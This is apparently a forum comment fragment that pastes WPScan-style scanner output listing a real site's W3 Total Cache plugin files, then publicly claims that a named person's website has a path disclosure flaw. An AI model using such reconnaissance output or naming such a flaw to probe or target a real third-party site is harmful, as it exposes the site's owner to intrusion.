 | Readme: http://juncture.ro/wp-content/plugins/w3-total-cache/readme.txt
 | Changelog: http://juncture.ro/wp-content/plugins/w3-total-cache/changelog.txt
[+] Memory used: 2.656 MB
-1 points
-
I understand that it is forbidden to mention "interesting things that are not done on your own network" with governmental connections, but I would like to point out that Vic Monta's website has path disclosure!
-1 points